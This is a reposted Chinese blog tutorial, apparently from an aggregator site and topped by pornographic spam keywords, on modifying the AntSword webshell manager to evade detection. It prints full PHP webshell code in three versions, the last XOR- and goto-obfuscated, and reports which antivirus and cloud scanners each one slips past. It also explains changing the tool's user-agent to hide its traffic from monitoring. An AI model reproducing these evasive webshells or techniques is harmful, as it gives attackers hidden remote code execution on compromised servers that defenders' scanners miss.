国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

php_webshell免殺--從0改造你的AntSword

這篇具有很好參考價(jià)值的文章主要介紹了php_webshell免殺--從0改造你的AntSword。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

0x00 前言:

為什么會(huì)有改造蟻劍的想法,之前看到有做冰蝎的流量加密,來看到繞過waf,改造一些弱特征,通過流量轉(zhuǎn)換,跳過密鑰交互。

但是,冰蝎需要反編譯去改造源碼,再進(jìn)行修復(fù)bug,也比較復(fù)雜。而AntSword相對(duì)于冰蝎來說,不限制webshell,即一句話也可以進(jìn)行連接,還可以自定義編碼器和解碼器,可以很容易讓流量做到混淆。

0x01 蟻劍介紹及其改編:

關(guān)于蟻劍的介紹,這里就不多說了,一個(gè)連接webshell的管理器,使用前端nodejs進(jìn)行編碼。AntSword給我最大的好處是可以連接一句話木馬,而且可以自定義編碼器和解碼器。這讓我們就有了很多種webshell的變換。

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

但是,蟻劍默認(rèn)的編碼器和菜刀都是一樣的,這里用burpsuite來進(jìn)行抓包看下流量。

蟻劍默認(rèn)流量

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

返回來的是默認(rèn)蟻劍的默認(rèn)流量,所以的話,這里就基本上過不去態(tài)勢感知和waf,所以很容易想到了編碼器和解碼器的選擇,可以進(jìn)行流量的改造來進(jìn)行waf的繞過,先選用最默認(rèn)的base64進(jìn)行測試。

默認(rèn)的base64編碼器

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

但是看到了使用base64編碼之后是有eval字樣的,這樣的話,肯定被態(tài)勢感知和全流量一體機(jī)來進(jìn)行特征的抓取,肯定會(huì)報(bào)威脅。

去github上找到蟻劍的編碼器和對(duì)應(yīng)的解碼器

github地址:https://github.com/AntSwordProject/AwesomeEncoder/tree/master/php這里下載默認(rèn)的aes-128的默認(rèn)流量。

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

這里進(jìn)行流量抓取。里面自帶了php的webshell。

<?php
@session_start();
$pwd='ant';
$key=@substr(str_pad(session_id(),16,'a'),0,16);
@eval(openssl_decrypt(base64_decode($_POST[$pwd]),?'AES-128-ECB',?$key,?OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
?>
默認(rèn)webshell講解:
這里打開session_start,然后截取Cookie中的PHPSESSION的16位。
然后進(jìn)行aes加密,密碼為pwd

再D盾,河馬和阿里云進(jìn)行掃描:

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

河馬沒有查出來,可能是比較弱

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

阿里云直接報(bào)惡意

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

初步修改后的webshell:

這里先做代碼修改,直接放出我修改之后的webshell代碼。

<?php
@session_start();
error_reporting(E_ALL^E_NOTICE^E_WARNING);
function?decode($key,$data){
$data_new?=?'';
for($i=0;$i<=strlen($data);$i++){
$b=$data[$i]^$key;
$data_new?=?$data_new.urldecode($b);
}
define('ass',$data_new[0].strrev($data_new)[2].strrev($data_new)[2].$data_new[11].strrev($data_new)[4].strrev($data_new)[0]);
define('ev',$data_new[11].strrev($data_new)[8].$data_new[0].strrev($data_new)[6].'($result)');
return?$data_new;
}
function?decrypto($key,$data){
$data?=?base64_decode($data);
$result?=?openssl_decrypt($data,?'AES-128-ECB',?$key,?OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);
decode('\\','=:=om>n?o8h9i:j;k*d0e.l/m(');
$ass=ass;
$ass(ev);
}
class?run{
????public?$data;
????public?function?__construct(){
$this->data?=?'#````````#'.$_POST[1]."#`#`#";
$this->data?=?$this->data."123456";
}
}
$key=@substr(str_pad(session_id(),16,'a'),0,16);
$run?=?new?run();
decrypto($key,$run->data);
?>

這里能過去D盾的靜態(tài),但是無法繞過阿里云查殺。

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

所以這里還需要進(jìn)行代碼混淆。(這也是之后webshell免殺常常用到的)

混淆之后的webshell:

這里提供php在線加密的站

https://enphp.djunny.com/

這里加密之后生成webshell。如下:

<?php
?goto?Zc4oD;?UJih6:?function?decrypto($key,?$data)?{?goto?LBrqg;?P6YrI:?$ass?=?ass;?goto?aR6yN;?svn0O:?$result?=?openssl_decrypt($data,?"\x41\x45\x53\x2d\x31\x32\70\55\105\x43\x42",?$key,?OPENSSL_RAW_DATA?|?OPENSSL_ZERO_PADDING);?goto?ATbMy;?LBrqg:?$data?=?base64_decode($data);?goto?svn0O;?ATbMy:?decode("\x5c",?"\75\72\x3d\157\x6d\x3e\x6e\x3f\x6f\x38\x68\71\151\x3a\x6a\x3b\x6b\x2a\x64\x30\x65\56\x6c\57\155\50");?goto?P6YrI;?aR6yN:?$ass(ev);?goto?k6RVH;?k6RVH:?}?goto?DGZMG;?WvjFi:?ini_set("\144\151\x73\160\x6c\x61\x79\x5f\145\162\x72\x6f\162\x73",?"\117\146\x66");?goto?Wguwk;?DGZMG:?class?run?{?public?$data;?public?function?__construct()?{?$this->data?=?"\43\140\x60\140\140\x60\140\x60\x60\43"?.?$_POST[1]?.?"\x23\140\x23\140\43";?}?}?goto?Berxy;?UUYvT:?$run?=?new?run();?goto?apKNY;?Berxy:?$key?=?@substr(str_pad(session_id(),?16,?"\141"),?0,?16);?goto?UUYvT;?Zc4oD:?@session_start();?goto?WvjFi;?Wguwk:?function?decode($key,?$data)?{?goto?LGJR3;?Ef77S:?$i?=?0;?goto?KvZGg;?rSTXM:?define("\141\x73\x73",?$data_new[0]?.?strrev($data_new)[2]?.?strrev($data_new)[2]?.?$data_new[11]?.?strrev($data_new)[4]?.?strrev($data_new)[0]);?goto?TQ6r4;?Tbglr:?return?$data_new;?goto?FsE2S;?tm2qt:?goto?I39OV;?goto?eF7jG;?AqTZZ:?$data_new?=?$data_new?.?urldecode($b);?goto?FriN_;?TQ6r4:?define("\x65\166",?$data_new[11]?.?strrev($data_new)[8]?.?$data_new[0]?.?strrev($data_new)[6]?.?"\50\x24\x72\145\163\165\154\x74\51");?goto?Tbglr;?FriN_:?bLexq:?goto?gITff;?eF7jG:?RuTl1:?goto?rSTXM;?gITff:?$i++;?goto?tm2qt;?KdSCg:?if?(!($i?<=?strlen($data)))?{?goto?RuTl1;?}?goto?d9N4J;?d9N4J:?$b?=?$data[$i]?^?$key;?goto?AqTZZ;?LGJR3:?$data_new?=?'';?goto?Ef77S;?KvZGg:?I39OV:?goto?KdSCg;?FsE2S:?}?goto?UJih6;?apKNY:?decrypto($key,?$run->data);

經(jīng)過加密之后,可以發(fā)現(xiàn),進(jìn)行了goto的混淆,所以這里就達(dá)到了代碼混淆。因?yàn)橹袄@過了D盾和河馬,這里直接去阿里云查殺。

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

已經(jīng)成功繞過阿里云查殺。用burpsuite抓下流量特征。

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

從流量加密來分析的話,已經(jīng)能繞過態(tài)勢感知和全流量分析機(jī)。

0x02 蟻劍UA頭的修改:

在burp的數(shù)據(jù)包中能清楚的看到蟻劍的特征

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

在目錄/modules/request.js文件中修改UA頭

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

/modules/update.js文件修改

php_webshell免殺--從0改造你的AntSword,php,網(wǎng)絡(luò)安全,安全

0x03 總結(jié):

關(guān)于免殺來說,通常是進(jìn)行代碼加密混淆,特征碼替換或者分割傳輸?shù)惹闆r。之前有想寫過shellcode免殺,但是還沒有過windows defender,所以就推遲一段時(shí)間來寫。感謝各位拜讀。

Tip:這個(gè)馬目前已經(jīng)過不了阿里了,已經(jīng)被阿里抓特征了。但是整體思路沒有改變,所以大家可以自己去發(fā)揮思路去整合。文章來源地址http://www.zghlxwxcb.cn/news/detail-680299.html

到了這里,關(guān)于php_webshell免殺--從0改造你的AntSword的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 免費(fèi)簡單好用的 webshell 在線檢測:支持 php、jsp、asp等多格式文件

    免費(fèi)簡單好用的 webshell 在線檢測:支持 php、jsp、asp等多格式文件

    話不多說,直接上圖上鏈接:https://rivers.chaitin.cn/?share=3d4f2e8aaec211eea5550242c0a8170c 還是比較好用的,支持 PHP、JSP 文件 webshell 檢測,看官方解釋文檔,引擎使用靜態(tài)文本特征、骨架哈希、靜態(tài)語義分析、動(dòng)態(tài)污點(diǎn)追蹤、動(dòng)態(tài)插樁內(nèi)存等檢測技術(shù),聽起來比較高級(jí)。 也提供 API 接

    2024年02月02日
    瀏覽(28)
  • PHP 基礎(chǔ)知識(shí):40 道選擇題測試你的掌握程度期末考試必備

    當(dāng)然可以!以下是40道關(guān)于PHP的理論選擇題,希望對(duì)您有所幫助: PHP的縮寫代表什么? a) Personal Hypertext Preprocessor b) Preprocessed Hypertext Processor c) PHP: Hypertext Preprocessor d) Programming Hypertext Processor 答案: c 在PHP中,如何輸出文本到瀏覽器? a) echo “Hello World!”; b) print(“Hello World!”

    2024年02月02日
    瀏覽(31)
  • 木馬免殺(篇三)靜態(tài)免殺方法

    木馬免殺(篇三)靜態(tài)免殺方法

    緊接上一篇,是通過 cs 生成 shellcode 并直接用python 調(diào)用動(dòng)態(tài)鏈接庫執(zhí)行 shellcode 。 生成后的exe文件未進(jìn)行任何處理。 現(xiàn)在學(xué)習(xí)一些可以繞過靜態(tài)免殺的方法。即將文件上傳到目標(biāo)不會(huì)被殺軟查殺,但這只是靜態(tài)方面。 動(dòng)態(tài)免殺方面還涉及到很多東西,像進(jìn)程注入手段。 花指

    2024年02月07日
    瀏覽(23)
  • 繞過殺軟(二)——免殺exe文件(360、火絨免殺)

    繞過殺軟(二)——免殺exe文件(360、火絨免殺)

    攻擊機(jī): win7 IP: 192.168.32.134 靶機(jī): windows server 2012(安裝360、火絨) IP: 192.168.32.133 第一步:使用njRAT生產(chǎn)一個(gè)客戶端exe木馬 輸入回連端口號(hào)8888,點(diǎn)擊start 配置客戶端木馬的回連地址:192.168.32.134 將文件保存在桌面 開啟360殺毒,直接報(bào)毒,不免殺 1、將生成的客戶端木馬:

    2024年01月17日
    瀏覽(18)
  • WebShell是什么?如何抵御WebShell?

    這邊簡單的給各位看官介紹一下: Webshell是通過服務(wù)器開放的端口獲取服務(wù)器的某些權(quán)限。 webshell又稱腳本木馬,一般分為大馬、小馬、一句話木馬三種. 大馬,體積大、功能齊全、能夠管理數(shù)據(jù)庫、文件管理、對(duì)站點(diǎn)進(jìn)行快速的信息收集,甚至能夠提權(quán)。 小馬,一般而言,我

    2024年02月09日
    瀏覽(14)
  • Android 免殺教程

    Android 免殺教程

    免殺練習(xí)兩年半 目錄 msfvenom 自動(dòng)生成 自帶免殺 工具免殺 Thefatrat venom 工具小記 加殼 源碼免殺 加殼 源碼混淆 數(shù)據(jù)通信 對(duì)抗反編譯 反編譯工具崩潰 ZIP文件格式對(duì)抗 AndroidManifest.xml 對(duì)抗反編譯小結(jié) VT檢測 https://www.virustotal.com/gui/home/upload 查看一下msfvenom里面的android木馬 使用

    2024年02月04日
    瀏覽(12)
  • 免殺方法(一)mimikazta

    免殺方法(一)mimikazta

    Mimikazta是一款能夠從Windows認(rèn)證(LSASS)的進(jìn)程中獲取內(nèi)存,并且獲取 明文密碼和NTLM哈希值的工具,攻擊者可以借此漫游內(nèi)網(wǎng)。也可以通過明文 密碼或者傳遞hash值來提權(quán)。因?yàn)檫@款工具特別出名所以被查殺的機(jī)率很大, 我們可以通過github上的開源代碼對(duì)其進(jìn)行源碼免殺從而by

    2024年02月06日
    瀏覽(22)
  • 免殺入門---shellcode免殺

    免殺入門---shellcode免殺

    ????????本文僅用于技術(shù)學(xué)習(xí)和交流,嚴(yán)禁用于非法用途,否則產(chǎn)生的一切后果自行承擔(dān)。 ????????免殺技術(shù)全稱為反殺毒技術(shù)Anti Anti- Virus簡稱“免殺”,它指的是一種能使病毒木馬免于被殺毒軟件查殺的技術(shù)。 ????????市面上的殺毒軟件基本由掃描器、病毒特征

    2024年02月02日
    瀏覽(19)
  • CS免殺上線方式

    ??博客主頁:Scorpio_m7 ??歡迎關(guān)注??點(diǎn)贊??收藏??留言?? ??本文由 Scorpio_m7原創(chuàng),CSDN首發(fā)! ??首發(fā)時(shí)間:??2022年1月28日?? ??堅(jiān)持和努力一定能換來詩與遠(yuǎn)方! ??作者水平很有限,如果發(fā)現(xiàn)錯(cuò)誤,請(qǐng)留言轟炸哦!萬分感謝感謝感謝! wmic是一款Microsoft工具,它提供

    2024年02月07日
    瀏覽(19)
  • msf編碼免殺

    msf編碼免殺

    目錄 (一)認(rèn)識(shí)免殺 1、殺軟是如何檢測出惡意代碼的? 2、免殺是做什么? 3、免殺的基本方法有哪些? (二) 不處理payload直接生成樣本進(jìn)行檢測 1、生成后門 2、開啟http服務(wù) 3、打開Web頁 4、在網(wǎng)站上傳分析 (三) MSF自編碼處理payload生成樣本進(jìn)行檢測 1、查看可以用編碼模

    2024年02月05日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包